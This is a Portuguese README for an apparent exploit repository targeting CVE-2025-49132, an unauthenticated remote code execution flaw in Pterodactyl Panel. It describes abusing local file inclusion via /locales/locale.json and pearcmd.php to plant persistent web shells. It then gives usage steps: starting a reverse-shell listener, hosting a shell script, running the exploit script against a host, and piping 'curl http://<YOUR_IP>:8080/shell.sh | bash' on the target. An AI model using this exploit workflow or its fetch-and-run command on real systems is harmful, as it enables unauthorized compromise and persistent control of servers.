
Exploit automatizado para CVE-2025-49132, uma RCE crítica não autenticada no Painel Pterodactyl. Utiliza LFI via endpoint de localidade para implantar shells web persistentes e obter acesso de shell reverso.
Este repositório contém um exploit especializado para CVE-2025-49132, uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada no Pterodactyl Panel (anterior à v1.11.11).
A vulnerabilidade existe no endpoint /locales/locale.json. Ao manipular os parâmetros de consulta locale e namespace, um atacante pode aproveitar uma Inclusão de Arquivo Local (LFI) para interagir com pearcmd.php. Isso permite a criação arbitrária de arquivos e execução de comandos, levando a um comprometimento total do sistema.
O script ape.py automatiza os seguintes passos:
Para obter um callback bem-sucedido no alvo, siga este fluxo de trabalho:
penelope -p 4444
Servidor de Staging: Se usar um script shell personalizado, hospede-o via Python:
python3 -m http.server 8080
python3 ape.py --host xxx.xxx.xxx --interactive
shell> curl http://<YOUR_IP>:8080/shell.sh | bash